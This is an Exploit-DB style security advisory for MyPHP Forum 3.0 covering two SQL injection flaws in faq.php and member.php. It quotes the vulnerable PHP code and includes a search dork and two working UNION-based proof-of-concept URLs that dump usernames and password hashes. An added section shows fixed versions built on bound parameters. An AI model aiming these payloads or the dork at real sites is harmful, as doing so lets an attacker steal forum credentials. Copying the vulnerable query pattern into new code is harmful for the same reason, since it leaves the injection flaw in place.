MyPHP Forum 3.0 (Final) - Multiple SQL Injections

EDB-ID: 4822
Author: x0kster
Type: webapps
Platform: PHP
Published: 2007-12-31

Name            :  MyPHP Forum <= 3.0 (Final) Multiple Remote SQL Injection Vulnerability
Author          :  x0kster
Email           :  x0kster@gmail.com
Site            :  ihteam.net
Script Download :  http://www.myphp.ws/
Date            :  31/12/2007
Dork            :  "Powered by: MyPHP Forum"

Note:
For this to work, magic_quotes_gpc must be turned off on the server.
Usually the table prefix is 'nb'.



SQL injection in faq.php

   <?php
    //faq.php
    [...]
    $id = $_GET['id'];
    if($action == "view" && !empty($id)) {
	$result = mysql_query("SELECT * from $db_faq WHERE id='$id'") or die(mysql_error()); // <-- $id goes into the query with no validation or escaping
	$row = mysql_fetch_array($result);
	$row[answer] = postify($row[answer]);
    [...]
   ?>

So we can perform an SQL injection through the unvalidated variable $id.

PoC:

http://Site/faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1/*




SQL injection in member.php

   <?php
    //member.php
   [...]
    if($action == "viewpro") {
	$member = $HTTP_GET_VARS['member'];
	$query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die(mysql_error());
   [...]
   ?>

The $member variable isn't validated or escaped either, so it can be exploited in the same way.

PoC:

http://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/*
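
The two lookups quoted above from faq.php and member.php, rewritten with bound parameters and input validation. This is an added example, not MyPHP Forum code and not part of the original advisory. The function names, the nb_faq table name, the column layout and the in-memory SQLite database are assumptions made so the block runs offline; the forum itself uses MySQL, where the same PDO calls apply.

```php
<?php
// Added example (not MyPHP Forum code): hardened versions of the two queries.
// Function names, table layout and sample rows are hypothetical.

function faq_by_id(PDO $db, string $faqTable, $id): ?array
{
    // FAQ ids are numeric: reject anything else before touching the database.
    if (!is_string($id) || !ctype_digit($id)) {
        return null;
    }
    // The table name comes from the forum's config ($db_faq), never from the request.
    $stmt = $db->prepare("SELECT * FROM $faqTable WHERE id = :id");
    $stmt->execute([':id' => (int) $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function member_by_name(PDO $db, string $memberTable, $member): ?array
{
    // Length limit of 64 is an assumed bound, not taken from the forum's schema.
    if (!is_string($member) || $member === '' || strlen($member) > 64) {
        return null;
    }
    // The username is bound as data, so quotes in it cannot change the query.
    $stmt = $db->prepare("SELECT * FROM $memberTable WHERE username = :name");
    $stmt->execute([':name' => $member]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE nb_faq (id INTEGER PRIMARY KEY, question TEXT, answer TEXT)");
$db->exec("CREATE TABLE nb_member (uid INTEGER PRIMARY KEY, username TEXT, password TEXT)");
$db->exec("INSERT INTO nb_faq VALUES (1, 'How do I register?', 'Use the register link.')");
$db->exec("INSERT INTO nb_member VALUES (1, 'admin', 'constructed-hash')");

// Request values shaped like the PoC parameters above (second one shortened).
$idPayload = "-1' union select 1,concat(username,0x3a,password),3 from nb_member where uid=1/*";
$memberPayload = "-1' union select 1,2,3 from nb_member where uid=1/*";

var_dump(faq_by_id($db, 'nb_faq', '1')['question']);             // normal lookup
var_dump(faq_by_id($db, 'nb_faq', $idPayload));                  // fails the numeric check
var_dump(member_by_name($db, 'nb_member', 'admin')['username']); // normal lookup
var_dump(member_by_name($db, 'nb_member', $memberPayload));      // no user has this literal name
```

magic_quotes_gpc, which the note above names as the only obstacle, was removed in PHP 5.4, so bound parameters are the control to rely on rather than that setting.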

# milw0rm.com [2007-12-31]